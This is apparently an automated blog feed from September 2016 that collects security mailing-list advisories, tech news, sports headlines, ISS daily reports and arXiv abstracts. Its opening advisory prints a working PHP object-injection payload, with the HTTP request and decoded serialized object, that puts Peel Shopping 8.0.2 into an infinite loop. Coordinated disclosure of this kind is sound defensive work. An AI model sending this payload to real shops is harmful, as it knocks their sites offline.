Security Advisory - Curesec Research Team 1. Introduction Affected Product: Peel Shopping 8.0.2 Fixed in: 8.0.3 Fixed Version Link: http://ift.tt/2cISd85 Vendor Website: http://ift.tt/2cISd85 Vulnerability Type: Object Injection Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 09/15/2016 Release mode: Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection. Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and has thus a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop. 3. Details The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required. The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS. Proof of Concept: GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Cookie: last_views=[INJECTED_OBJECT]; DOS Example: The Smarty_Internal_Configfileparser class can be used to create an infinite loop. GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Cookie: last_views= %4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d; Connection: close (Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1; s:11:"yyTokenName";a:0:{}}) 4. Solution To mitigate this issue please upgrade at least to version 8.0.3 Please note that a newer version might already be available. 5. Report Timeline 04/11/2016 Informed Vendor about Issue 04/12/2016 Vendor announces release of fix before 05/11/2016 09/14/2016 Disclosed to public Blog Reference: http://ift.tt/2cRBcGc

Source: Gmail -> IFTTT-> Blogger

[FD] Insecure transmission of data in Android applications developed with Adobe AIR [CVE-2016-6936]

Original at: http://ift.tt/2cKw1f0 Summary Android applications developed with Adobe AIR send data back to Adobe servers without HTTPS while running. This can allow an attacker to compromise the privacy of the applications’ users. This has been fixed in Adobe AIR SDK release v23.0.0.257. Details Adobe AIR is a developer product which allows the same application code to be compiled and run across multiple desktop and mobile platforms. While monitoring network traffic during testing of several Android applications we observed network traffic over HTTP without the use of SSL going to several Adobe servers including the following: - airdownload2.adobe.com - mobiledl.adobe.com Because encryption is not used, this would allow a network-level attacker to observe the traffic and compromise the privacy of the applications’ users. This affects applications compiled with the Adobe AIR SDK versions 22.0.0.153 and earlier. Vendor Response Adobe has released a fix for this issue on September 13th, 2016 in Adobe AIR SDK v23.0.0.257. Developers should update and rebuild their application using the latest SDK. References Adobe Security Bulletin: ASPB16-31 CVE: CVE-2016-6936 Timeline 2016-06-15: Report submitted to Adobe’s HackerOne program 2016-06-16: Report out of scope for this program, directed to Adobe’s PSIRT 2016-06-16: Submitted via email to Adobe’s PSIRT 2016-06-17: Reply received from PSIRT and a ticket number is assigned 2016-09-09: Response received from the vendor that the fix will be released next week 2016-09-13: Fix released 2016-09-14: Public disclosure

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple vulnerabilities in ASUS RT-N10

Hello list! There are multiple vulnerabilities in ASUS Wireless Router RT-N10. There are Code Execution, Cross-Site Scripting and URL Redirector Abuse vulnerabilities.

Source: Gmail -> IFTTT-> Blogger

[FD] Keypatch v2.0 is out!

Greetings, (cc: Thanh Nguyen, VNSecurity) We are excited to release Keypatch 2.0, a better assembler for IDA Pro! This new version of Keypatch brings some important features, as follows. - Fix some issues with ARM architecture (including Thumb mode) - Better support for Python 2.6 & older IDA versions (confirmed to work on IDA 6.4) - Save original instructions (before patching) in IDA comments. - NOP padding also works when new instruction is longer than original instruction. - You can fill a range of selected code via a new function “Fill Range” - It is now possible to "undo" (revert) the last modification. - All the functions are now available via a popup menu (right-mouse click) See the complete list of new features & full source code of Keypatch at http://ift.tt/2cYxtLy Thanks, Quynh http://ift.tt/1Scrjlb http://ift.tt/18OQOjV http://ift.tt/1KJ3yxs

Source: Gmail -> IFTTT-> Blogger

Re: [FD] CVE-2016-6662 - MySQL Remote Root Code Execution / Privilege Escalation ( 0day )

Well, 'remote root'... The PoC asks for a working MySQL user name and password. And I don't really get how that account can re-set the logfile location without SUPER privileges? Am I wrong in thinking that this is really "just" a MySQL admin -> root privilege escalation? Don't get me wrong, still a very nice exploit, but... Mark On 11-09-16 08:47, Dawid Golunski wrote: > Vulnerability: MySQL Remote Root Code Execution / Privilege Escalation 0day > CVE: CVE-2016-6662 > Severity: Critical > Affected MySQL versions (including the latest): > <= 5.7.15 > <= 5.6.33 > <= 5.5.52 > > Discovered by: > Dawid Golunski > http://legalhackers.com > > An independent research has revealed multiple severe MySQL vulnerabilities. > This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662. > The vulnerability affects MySQL servers in all version branches > (5.7, 5.6, and 5.5) including the latest versions, and could be exploited by > both local and remote attackers. > Both the authenticated access to MySQL database (via network > connection or web interfaces such as phpMyAdmin) and SQL Injection > could be used as exploitation vectors. > > Successful exploitation could allow attackers to execute arbitrary code with > root privileges which would then allow them to fully compromise the server on > which an affected version of MySQL is running. > > This advisory provides a (limited) Proof-Of-Concept MySQL exploit > which demonstrates how Remote Root Code Execution could be achieved by > attackers. Full PoC will be provided later on to give users a chance > to react to this exploit as the issue has not been patched by all the > affected vendors yet despite efforts. > > The exploitation is interesting in the way that it involves an > oldschool LD_PRELOAD environment variable and that it targets a > service that doesn't > serve requests as root but could still be tricked to get root RCE when > restarted. > Might give you strange feelings when restarting mysql service the next time ;) > > The advisory is available at: > > http://ift.tt/2c43oEh > >

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Brute force every Samsung repair customer's info with ease

[FD] Security Advisory -- Multiple Vulnerabilities - MuM Map Edit

# Security Advisory -- Multiple Vulnerabilities - MuM Map Edit ## Product Vendor: Mensch und Maschine Software SE / Mensch und Maschine acadGraph GmbH Product: MapEdit Affected software version: 3.2.6.0 MuM MapEdit provides geodata to the internet and intranets and is deployed on several communal and regional governmental infrastructures to provide geodata to the population. It consists of a silverlight client and a C#.NET backend. The communication between them is HTTP/S based and involves the NBFS (.NET Binary Format SOAP). Link: http://ift.tt/2cYwD1k ## Status/Metrics/Identifier CVE-ID: tbd CVSS v2 Vector: (AV:N/AC:L/Au:S/C:C/I:C/A:C) CVSS Score: 9.0 The CVSS Score reflects the possibility of an attacker to upload web shells and execute them with the privileges of the web server user. ## Author/Credits Paul Baade (TÜV Rheinland i-sec GmbH) Sven Krewitt (TÜV Rheinland i-sec GmbH) ## Fixed Versions According to MuM all described vulnerabilities are fixed in version 6.2.74, some of them are reportedly already fixed in version 5.1. ## Authentication via GET Parameter The application requires users to provide their credentials via GET Parameters. They can therefore possibly be found in server logs or proxy logs. An example URL would be: /Mum.Geo.Services/Start.aspx?AutoUrl=1&Username=TEST&Password=TEST[...] ## Execution of arbitrary SQL commands on contained SQLite DBs The application contains several SQLite databases. An authenticated user may send POST requests to the URL /Mum.Geo.Services/DataAccessService.svc. This service is used to execute SQL queries on the databases. The content of the POST request is encoded in Microsofts NBFS (.NET Binary Format SOAP) and can be decoded to the following XML data: Request:

Source: Gmail -> IFTTT-> Blogger

Re: [FD] Brute force every Samsung repair customer's info with ease

Re: [FD] Brute force every Samsung repair customer's info with ease

[FD] APPLE-SA-2016-09-14-1 iOS 10.0.1

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2016-09-13-3 watchOS 3

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2016-09-13-2 Xcode 8

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

[FD] APPLE-SA-2016-09-13-1 iOS 10

-----BEGIN PGP SIGNED MESSAGE-

Source: Gmail -> IFTTT-> Blogger

Ravens: WR Breshad Perriman returns to practice Thursday after missing Wednesday's workouts to deal with calf issue (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

leave original anonymous author's IP

I'm using bbPress Moderation plugin,. Setting Anonymous topics and replies: Always moderate topics checked. When moderator publish the topic, ...

from Google Alert - anonymous http://ift.tt/2cpWXwe
via IFTTT

ISS Daily Summary Report – 09/14/2016

Asia Try Zero-G: The crew performed the ASIA TRY ZERO-G experiment.  The crew performed science experiments on themes proposed by six different countries throughout Asia.  The downlinked video will be used to promote the understanding of space activity for Asian countries. Electrostatic Levitation Furnace (ELF) Troubleshooting: The crew is troubleshooting the ELF facility.  The crew removed hardware from the Multi-Purpose Small Payload Rack (MSPR)-2 and connected the laptop via USB to provide the ground the ability to load software to the ELF subunits.  Troubleshooting is scheduled to continue through Friday, September 16th.  The Electrostatic Levitation Furnace (ELF) is an experimental facility designed to levitate/melt/solidify materials by containerless processing techniques using the Electrostatic Levitation method. With this facility, thermophysical properties of high temperature melts can be measured, and solidification from deeply undercooled melts can be achieved. The ELF is located in the JEM Multipurpose Small Payload Rack (MSPR) in Kibo. Phase Change Heat Exchanger (PCHx): The crew began the installation of the PCHx into EXpedite PRocessing of Experiments to Space Station (EXPRESS) Rack (ER)-8.  The crew was initially unable to mate the Low Temperature Loop (LTL) Quick Disconnect (QD) to complete the PCHx installation.  After further troubleshooting, the crew was able to mate the LTL supply line, and continued with PCHx Installation.  The crew will check for any leaks and ground teams will continue with verification.  The primary objective of the PCHx Project is to create a unique test platform utilizing the EXPRESS Rack on the ISS to advance the technology readiness level of phase change heat exchangers for infusion into future exploration vehicles. Phase change material heat exchangers are a useful technology that helps certain space missions in regulating the thermal conditions on their particular spacecraft. They serve as a supplemental heat rejection device during time-varying heat loads and/or transient environments. It does so by storing waste energy by melting a phase change material during peak loads. It can then reject this energy through a radiator when conditions allow, causing the phase change material to freeze.  NanoRack Cubesat Deployer (NRCSD) #9 Deployment: Ground controllers deployed the first of four pairs of Planet Lab DoveSats from the NRCSD #9.  One solar array on the first cubesat and both solar arrays on the second cubesat deployed early, which was an expected possibility and there are no impacts.  The remaining three pairs of cubesats will be deployed through tonight’s crew sleep period.  This deployment titled “Flock 2” is a fleet of nanosatellites designed, built and operated by Planet Labs Inc., and will enable imagery of the changing planet to be taken on a frequent basis, with humanitarian and environmental applications ranging from monitoring deforestation and the ice caps to disaster relief and improving agriculture yields in developing nations.  Nitrogen/Oxygen Recharge System (NORS) Setup and Oxygen Transfer: The crew demated and stowed a depleted O2 recharge tank and then installed a new O2 recharge tank and configured NORS to transfer O2 to the US Airlock High Pressure Gas Tanks (HPGTs). Today’s Planned Activities All activities were completed unless otherwise noted. Electrostatic Levitation Furnace (ELF) Item Gathering DOSETRK Data Input Monthly Inspection of T2 Treadmill System IDENTIFICATION. Copy ИМУ-Ц micro-accelerometer data to laptop ASIAN Experiment Ops CARDIOVECTOR. Experiment Phase Change HX (PCHX) Hardware Setup Preparation and Configuration Setup for Remote RS Laptop on USOS Testing RS Remote Laptop with КЦП1 and КЦП2 Tear Down of Remote RS Laptop Setup JEMAL Experiment Ops Vacuum Cleaning of ВД1 and ВД2 air ducts in DC1 XF305 Camcorder Settings Adjustment MSPR2 Hardware Removal SEISMOPROGNOZ. Downlink data from Control and Data Acquisition Module (МКСД) Hard Drive O2 Transfer Termination MSPR2 Hardware Removal JEMAL Hardware Setup JEMAL Closeout Ops ELF Hardware Reconfiguration OTKLIK. Equipment Check Measuring Partial CO Pressure in RS using US portable CSA-CP device INTERACTION-2. Experiment Ops PCHX Hardware Setup Multi Omics (MO) Kits Setup  IMS Delta File Prep CUBESAT Hardware Photography Atmosphere Control System (ACS) Nitrogen and Oxygen Recharge System (NORS) Start Oxygen Transfer  HMS Defibrillator Inspection EMU Metox Regeneration ELF Electrostatic Levitation Furnace Cable Change  Completed Task List Items None Ground Activities All activities were completed unless otherwise noted. JEMRMS retrieval of NRCSD from JEMAL NRCSD deploy (4) Phase Change Heat Exchanger activation Battery 4B1 reconditioning Three-Day Look Ahead: Thursday, 09/15: ARED 6 month, JPM window inspection, MDCA H/W replace, ELF troubleshooting Friday, 09/16: T2 Yearly Maintenance, Plant RNA Regulation Saturday, 09/17: Housekeeping, Crew Off Duty   QUICK ISS Status – Environmental Control Group:                               Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Process Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2cgSkGV
via IFTTT

Xiaomi Can Silently Install Any App On Your Android Phone Using A Backdoor

Do you own an Android Smartphone from Xiaomi, HTC, Samsung, or OnePlus? If yes, then you must be aware that almost all smartphone manufacturers provide custom ROMs like CyanogenMod, Paranoid Android, MIUI and others with some pre-loaded themes and applications to increase the device's performance. But do you have any idea about the pre-installed apps and services your manufacturer has


from The Hacker News http://ift.tt/2cXDND1
via IFTTT

Provide support for anonymous checkouts.

And it can use a setting to apply/remove the discount if anonymous checkout is enabled. This setting will provide an option to discount creator if the ...

from Google Alert - anonymous http://ift.tt/2cpETSD
via IFTTT

Enable anonymous-or properly secure- reporting of DBS code violations

Enable anonymous-or properly secure- reporting of DBS code violations. Posted by Philip Owens 10sc on September 14, 2016. Currently, to report a ...

from Google Alert - anonymous http://ift.tt/2d1R4JA
via IFTTT

FBI Director — You Should Cover Your Webcam With Tape

Should you put a tape or a sticker over the lens of your laptop's webcam? Yes, even Facebook CEO Mark Zuckerberg and FBI Director James Comey do that. Covering your laptop's webcam might be a hell cheap and good idea to guard against hackers and intruders who might want to watch your private life and environment through your devices. <!-- adsense --> In fact, Comey recently came out


from The Hacker News http://ift.tt/2cPKAKz
via IFTTT

The Rivers of the Mississippi Watershed

The Mississippi Watershed is the largest drainage basin in North America at 3.2 million square kilometers in area. The USGS has created a database of this area which indicates the direction of waterflow at each point. By assembling these directions into streamflows, it is possible to trace the path of water from every point of the area to the mouth of the Mississippi in the Gulf of Mexico. This animation starts with the points furthest from the Gulf and reveals the streams and rivers as a steady progression towards the mouth of the Mississippi until all the major rivers are revealed. The speed of the reveal of the rivers is not dependent on the actual speed of the water flow. The reveal proceeds at a constant velocity along each river path, timed so that all reveals reach the mouth of the Mississippi at the same time.

from NASA's Scientific Visualization Studio: Most Popular
via IFTTT

Wednesday, September 14, 2016

Anonymous

This is "Anonymous" by kenjacobs on Vimeo, the home for high quality videos and the people who love them.

from Google Alert - anonymous http://ift.tt/2csEt02
via IFTTT

Ravens: WR Derrick Mason among the first-time eligible nominees for the 2017 Pro Football Hall of Fame class (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


Openwave Mobility
Openwave Mobility empowers operators to manage and monetize the growth in mobile video and web traffic.
Redwood City, CA
http://t.co/Ya3XD9Kvc7
Following: 2732 - Followers: 3265

September 14, 2016 at 09:50PM via Twitter http://twitter.com/owMobility

Orioles: Steve Pearce gets PRP injection in elbow and is out indefinitely; Buck Showalter hopes he'll return this season (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

A trip to the moon


via Instagram http://ift.tt/2c9EIKc

"Flow Size Difference" Can Make a Difference: Detecting Malicious TCP Network Flows Based on Benford's Law. (arXiv:1609.04214v1 [cs.CR])

Statistical characteristics of network traffic have attracted a significant amount of research for automated network intrusion detection, some of which looked at applications of natural statistical laws such as Zipf's law, Benford's law and the Pareto distribution. In this paper, we present the application of Benford's law to a new network flow metric "flow size difference", which have not been studied by other researchers, to build an unsupervised flow-based intrusion detection system (IDS). The method was inspired by our observation on a large number of TCP flow datasets where normal flows tend to follow Benford's law closely but malicious flows tend to deviate significantly from it. The proposed IDS is unsupervised so no training is needed thus can be easily deployed. It has two simple parameters with a clear semantic meaning, allowing the human operator to set and adapt their values intuitively to adjust the overall performance of the IDS. We tested the proposed IDS on one closed and two public datasets and proved its efficiency in terms of AUC (area under the ROC curve). Being a simple and fast standalone IDS itself, the proposed method can also be easily combined with other network IDSs e.g. added as an additional component into another existing IDS to enhance its performance.



from cs.AI updates on arXiv.org http://ift.tt/2cvc1tz
via IFTTT

Quick and energy-efficient Bayesian computing of binocular disparity using stochastic digital signals. (arXiv:1609.04337v1 [cs.CV])

Reconstruction of the tridimensional geometry of a visual scene using the binocular disparity information is an important issue in computer vision and mobile robotics, which can be formulated as a Bayesian inference problem. However, computation of the full disparity distribution with an advanced Bayesian model is usually an intractable problem, and proves computationally challenging even with a simple model. In this paper, we show how probabilistic hardware using distributed memory and alternate representation of data as stochastic bitstreams can solve that problem with high performance and energy efficiency. We put forward a way to express discrete probability distributions using stochastic data representations and perform Bayesian fusion using those representations, and show how that approach can be applied to diparity computation. We evaluate the system using a simulated stochastic implementation and discuss possible hardware implementations of such architectures and their potential for sensorimotor processing and robotics.



from cs.AI updates on arXiv.org http://ift.tt/2c9DezC
via IFTTT

Finite LTL Synthesis is EXPTIME-complete. (arXiv:1609.04371v1 [cs.LO])

LTL synthesis -- the construction of a function to satisfy a logical specification formulated in Linear Temporal Logic -- is a 2EXPTIME-complete problem with relevant applications in controller synthesis and a myriad of artificial intelligence applications. In this research note we consider De Giacomo and Vardi's variant of the synthesis problem for LTL formulas interpreted over finite rather than infinite traces. Rather surprisingly, given the existing claims on complexity, we establish that LTL synthesis is EXPTIME-complete for the finite interpretation, and not 2EXPTIME-complete as previously reported. Our result coincides nicely with the planning perspective where non-deterministic planning with full observability is EXPTIME-complete and partial observability increases the complexity to 2EXPTIME-complete; a recent related result for LTL synthesis shows that in the finite case with partial observability, the problem is 2EXPTIME-complete.



from cs.AI updates on arXiv.org http://ift.tt/2cJtPEw
via IFTTT

Complexity Classification in Infinite-Domain Constraint Satisfaction. (arXiv:1201.0856v8 [cs.CC] UPDATED)

A constraint satisfaction problem (CSP) is a computational problem where the input consists of a finite set of variables and a finite set of constraints, and where the task is to decide whether there exists a satisfying assignment of values to the variables. Depending on the type of constraints that we allow in the input, a CSP might be tractable, or computationally hard. In recent years, general criteria have been discovered that imply that a CSP is polynomial-time tractable, or that it is NP-hard. Finite-domain CSPs have become a major common research focus of graph theory, artificial intelligence, and finite model theory. It turned out that the key questions for complexity classification of CSPs are closely linked to central questions in universal algebra.

This thesis studies CSPs where the variables can take values from an infinite domain. This generalization enhances dramatically the range of computational problems that can be modeled as a CSP. Many problems from areas that have so far seen no interaction with constraint satisfaction theory can be formulated using infinite domains, e.g. problems from temporal and spatial reasoning, phylogenetic reconstruction, and operations research.

It turns out that the universal-algebraic approach can also be applied to study large classes of infinite-domain CSPs, yielding elegant complexity classification results. A new tool in this thesis that becomes relevant particularly for infinite domains is Ramsey theory. We demonstrate the feasibility of our approach with two complete complexity classification results: one on CSPs in temporal reasoning, the other on a generalization of Schaefer's theorem for propositional logic to logic over graphs. We also study the limits of complexity classification, and present classes of computational problems provably do not exhibit a complexity dichotomy into hard and easy problems.



from cs.AI updates on arXiv.org http://ift.tt/189ughI
via IFTTT

Spacetimes with Semantics (III) - The Structure of Functional Knowledge Representation and Artificial Reasoning. (arXiv:1608.02193v2 [cs.AI] UPDATED)

Using the previously developed concepts of semantic spacetime, I explore the interpretation of knowledge representations, and their structure, as a semantic system, within the framework of promise theory. By assigning interpretations to phenomena, from observers to observed, we may approach a simple description of knowledge-based functional systems, with direct practical utility. The focus is especially on the interpretation of concepts, associative knowledge, and context awareness. The inference seems to be that most if not all of these concepts emerge from purely semantic spacetime properties, which opens the possibility for a more generalized understanding of what constitutes a learning, or even `intelligent' system.

Some key principles emerge for effective knowledge representation: 1) separation of spacetime scales, 2) the recurrence of four irreducible types of association, by which intent propagates: aggregation, causation, cooperation, and similarity, 3) the need for discrimination of identities (discrete), which is assisted by distinguishing timeline simultaneity from sequential events, and 4) the ability to learn (memory). It is at least plausible that emergent knowledge abstraction capabilities have their origin in basic spacetime structures.

These notes present a unified view of mostly well-known results; they allow us to see information models, knowledge representations, machine learning, and semantic networking (transport and information base) in a common framework. The notion of `smart spaces' thus encompasses artificial systems as well as living systems, across many different scales, e.g. smart cities and organizations.



from cs.AI updates on arXiv.org http://ift.tt/2b27bFo
via IFTTT

RETAIN: Interpretable Predictive Model in Healthcare using Reverse Time Attention Mechanism. (arXiv:1608.05745v3 [cs.LG] UPDATED)

Accuracy and interpretation are two goals of any successful predictive models. Most existing works have to suffer the tradeoff between the two by either picking complex black box models such as recurrent neural networks (RNN) or relying on less accurate traditional models with better interpretation such as logistic regression. To address this dilemma, we present REverse Time AttentIoN model (RETAIN) for analyzing Electronic Health Records (EHR) data that achieves high accuracy while remaining clinically interpretable. RETAIN is a two-level neural attention model that can find influential past visits and significant clinical variables within those visits (e.g,. key diagnoses). RETAIN mimics physician practice by attending the EHR data in a reverse time order so that more recent clinical visits will likely get higher attention. Experiments on a large real EHR dataset of 14 million visits from 263K patients over 8 years confirmed the comparable predictive accuracy and computational scalability to the state-of-the-art methods such as RNN. Finally, we demonstrate the clinical interpretation with concrete examples from RETAIN.



from cs.AI updates on arXiv.org http://ift.tt/2bcVk8w
via IFTTT

MLB Video: Orioles' Mark Trumbo demolishes a ball well over the Green Monster, traveling 448 feet into the Boston night (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Rick Porcello (20-3) and Red Sox look to extend AL East lead over Orioles (2 GB); watch live in the ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

MLB: Tony La Russa questions Adam Jones calling baseball a "white man's sport," asks "how much wronger can he be?" (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles will earn an AL wild-card spot because of their improved rotation and high-scoring offense - Eddie Matz (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens Image: LB Terrell Suggs shows off one of the 15 Joe Flacco "elite" T-shirts that players purchased (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Regression in overload resolution of a parameterless anonymous delegate

Regression in overload resolution of a parameterless anonymous delegate #13797. Open. agocke opened this Issue an hour ago · 2 comments ...

from Google Alert - anonymous http://ift.tt/2cYGiAJ
via IFTTT

Ravens: WR Breshad Perriman, who missed practice Wednesday, dealing with a "minor calf issue" - source (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Massive Data Breach Exposes 6.6 Million Plaintext Passwords from Ad Company

Another Day, Another Data Breach! And this time, it's worse than any recent data breaches. Why? Because the data breach has exposed plaintext passwords, usernames, email addresses, and a large trove of other personal information of more than 6.6 Million ClixSense users. ClixSense, a website that claims to pay users for viewing advertisements and completing online surveys, is the latest


from The Hacker News http://ift.tt/2cNjnbk
via IFTTT

ISS Daily Summary Report – 09/13/2016

NanoRack Cubesat Deployer (NRCSD) #9 Install: After extending the JEM Airlock (JEMAL) slide table into the cabin, FE-5 installed the NRCSD #9 quad-deployer onto the Multi-Purpose Experiment Platform Small Fine Arm Attachment Mechanism (MPEP/SAM) attachments this morning. The crew then retracted the slide table, closed the JEMAL hatch and depressurized the JEMAL in advance of the deployments tomorrow.  NRCSD #9 contains eight Planet Lab Dovesats that will be deployed in pairs of two.  Biomolecule Sequencer (BMS): FE-6 removed and thawed samples and flow cells from the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  The crew then initiated a 48-hour sequencing run.  This sequencing session will be the fourth utilizing the Commercial-Off-the-Shelf (COTS) MinION sequencer and Surface Pro 3 tablet.  The goals of the BMS experiment are to provide a proof-of-concept for the functionality and evaluate crew operability of a DNA sequencer in a space/microgravity environment.  The capability for sequencing of DNA in space could provide for a better ability to identify microbes in real-time, instead of requiring sample return and ground based analysis.  Selectable Optical Diagnostics Instrument Experiment Diffusion Coefficient Mixture-3 (SODI) DCMix-3 Installation:  FE-6 successfully installed the European Space Agency’s (ESA’s) SODI-DCMix-3 experiment into the Microgravity Science Glovebox (MSG).  Once installed, ground controllers will operate the SODI experiment for several weeks.  The main purpose of the SODI DCMix-3 investigation is the measurement of diffusion coefficients of selected ternary mixtures taking advantage of the reduced gravity environment available on board the ISS.  A combination of different and complementary techniques are used to characterize flight candidate samples among water-based and hydrocarbon mixtures. Experimental results from space experiments, performed in the Selectable Optical Diagnostic Instrument, are used to test thermodiffusion theories and develop physical and mathematical models for the estimation of thermo-diffusion coefficients.  Manufacturing Device: FE-6 installed a new medium for the Manufacturing Device.  This print medium will be used for a calibration printing followed by a higher priority device contracted through Center for the Advancement of Science in Space (CASIS).  Manufacturing Device consists of the Additive Manufacturing Facility (AMF), a permanent manufacturing facility on the ISS, providing hardware manufacturing services. The ability to manufacture on the ISS enables on-demand repair and production capability, as well as essential research for manufacturing on long-term missions. AMF allows for immediate repair of essential components, upgrades of existing hardware, installation of new hardware that is manufactured, and the manufacturing capability to support commercial interests on the ISS. Waste and Hygiene Compartment (WHC) Dose Pump Remove and Replace (R&R):  The crew has reported multiple WHC Pre-Treat Bad Quality Light (PTBQL) indications over the past several days.  This is an indication that the Dose Pump is reaching the end of its nominal six month life.  Today, they changed out the Dose Pump to return to nominal WHC operations.  The pump was last replaced in March of 2016. Lab Major Constituent Analyzer (MCA) Return to Operations:  During installation of the MCA vacuum jumper in preparation for Lab MCA pumpdown, the crew was unable to mate the jumper to the Waste Gas Quick Disconnect (QD) due to access issues. Ground teams are working alternate options for connecting the MCA to vacuum.  This is required to return the Lab MCA to an operational state.  Japanese Experiment Module (JEM) Encoder Remove and Replace (R&R):  The JEM Encoder was misconfigured with an off-nominal IP configuration, and could not be accessed. Today, FE-5 replaced the JEM Encoder with an on orbit spare in order to regain functionality.  Today’s Planned Activities All activities were completed unless otherwise noted. Changeout of 240ГК.52Ю 5100-0 Replaceable Unit Panel (ПАС) in DC1 JEMAL Experiment Ops BMS Retrieval of samples from MELFI CUBESAT Hardware Setup BMS Retrieval of samples from MELFI2 SODI Experiment BMS Experiment Ops JEMAL Closeout Ops JEMAL Depress and Vent Waste Hygiene Compartment (WHC) Dose Pump Removal and Replacement Water Recovery System Waste Water Tank Drain WRS Recycle Tank Fill from EDV Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves JEM Airlock Vent СОЖ Maintenance WRS Recycle Tank Fill from EDV HABIT Filling Questionnaire Selectable Optics Diagnostic Instrument (SODI) Hardware Setup IMS Delta File Completed Task List Items JAXA Video Take – Part 5 Ground Activities All activities were completed unless otherwise noted. JEM Airlock Depress Battery 4B1 Reconditioning Lab MCA Pumpout (Aborted) Three-Day Look Ahead: Wednesday, 09/14: NORS O2 transfer, PCHx install, Asian Try Zero-G, ELF troubleshooting Thursday, 09/15: ARED 6 month, JPM window inspection, MDCA H/W replace, ELF troubleshooting Friday, 09/16: T2 Yearly Maintenance, Plant RNA Regulation QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Idle Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Normal Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2cqRxTC
via IFTTT

The Project Zero Contest — Google will Pay you $200,000 to Hack Android OS

Why waiting for researchers and bug hunters to know vulnerabilities in your products, when you can just throw up a contest for that. Google has launched its own Android hacking contest with the first prize winner receiving $200,000 in cash. That's a Hefty Sum! The contest is a way to find and destroy dangerous Android vulnerabilities before hackers exploit them in the wild. <!-- adsense -->


from The Hacker News http://ift.tt/2cGZoiv
via IFTTT

Microsoft and Adobe Rolls Out Critical Security Updates - Patch Now!

In BriefYou should not miss this month’s Patch Updates, as it brings fixes for critical issues in Adobe Flash Player, iOS, Xcode, the Apple Watch, Windows, Internet Explorer, and the Edge browser. Adobe has rolled out a critical update to address several issues, most of which are Remote Code Execution flaws, in its widely-used Adobe Flash Player for Windows, Macintosh, Linux and ChromeOS.


from The Hacker News http://ift.tt/2cG7E28
via IFTTT

ISHU Anonymous

ISHU Anonymous.

from Google Alert - anonymous http://ift.tt/2cWBI6b
via IFTTT

Tuesday, September 13, 2016

Orioles Video: J.J. Hardy destroys a ball off the billboard over the Green Monster for a 3-run HR in 6-3 win at Red Sox (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Joint Extraction of Events and Entities within a Document Context. (arXiv:1609.03632v1 [cs.CL])

Events and entities are closely related; entities are often actors or participants in events and events without entities are uncommon. The interpretation of events and entities is highly contextually dependent. Existing work in information extraction typically models events separately from entities, and performs inference at the sentence level, ignoring the rest of the document. In this paper, we propose a novel approach that models the dependencies among variables of events, entities, and their relations, and performs joint inference of these variables across a document. The goal is to enable access to document-level contextual information and facilitate context-aware predictions. We demonstrate that our approach substantially outperforms the state-of-the-art methods for event extraction as well as a strong baseline for entity extraction.



from cs.AI updates on arXiv.org http://ift.tt/2cEFNPK
via IFTTT

Graph Aggregation. (arXiv:1609.03765v1 [cs.AI])

